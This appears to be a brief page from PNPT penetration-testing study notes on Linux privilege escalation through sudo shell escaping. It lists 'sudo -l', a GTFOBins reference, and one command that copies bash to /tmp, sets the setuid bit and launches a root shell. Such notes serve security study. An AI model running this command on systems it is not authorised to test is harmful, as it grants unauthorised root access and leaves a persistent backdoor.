PNPT
⌘
Ctrl
k
Linkedin
More
For the complete documentation index, see
llms.txt
. This page is also available as
Markdown
.
Copy
On this page
Linux Privilege Escalation
Sudo
Shell Escaping
Copy
sudo -l
GTFOBins
gtfobins.github.io
Copy
cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p
Previous
Sudo
Next
Intended Functionality
Last updated
2 years ago